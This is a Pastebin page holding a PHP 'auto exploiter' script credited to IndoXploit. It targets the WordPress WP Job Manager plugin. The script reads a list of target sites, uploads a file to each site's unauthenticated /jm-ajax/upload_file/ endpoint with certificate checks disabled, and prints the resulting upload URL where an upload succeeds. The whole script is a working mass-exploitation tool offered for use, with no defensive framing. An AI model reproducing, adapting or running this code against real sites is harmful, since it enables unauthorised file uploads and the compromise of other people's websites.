G2A Many GEOs
SHARE
TWEET

Auto Exploiter WP Job-Manager - IndoXploit

choirurrizal Jul 26th, 2017 (edited) 82 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. # Tu5b0l3d - IndoXploit
  3. # http://www.indoxploit.or.id/2017/06/auto-exploit-plugin-wp-job-manager.html
  4.  
  5.  
  6. $nama = "target.html";
  7. $buka=fopen("$nama","r");
  8. $size=filesize("$nama");
  9. $baca=fread($buka,$size);
  10. $sites = explode("\r\n", $baca);
  11. foreach($sites as $site){
  12.     if(preg_match("#http://#", $site)) {
  13.     $suu = $site;
  14.  } else {
  15.    $suu = "http://".$site;
  16.  }
  17.     echo "$suu ->";
  18.     $file = "k.png";
  19.     $site = "$suu/jm-ajax/upload_file/";
  20.     $post = array(
  21.                     "file" => "@$file",
  22.                     );
  23. $ch = curl_init ("$site");
  24. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  25. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  26. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  27. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  28. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  29. curl_setopt ($ch, CURLOPT_POST, 1);
  30. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  31. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  32. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  33. $data6 = curl_exec ($ch);
  34.         if (preg_match("/$file/i", $data6)){
  35.             $save = "$suu/wp-content/uploads/job-manager-uploads/file/2017/06/$file";
  36.                 echo  " \n$save\n";
  37.              
  38.         }else{
  39.                 echo " \nNo\n"; }
  40.     }
  41.    
  42.  
  43. ?>
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top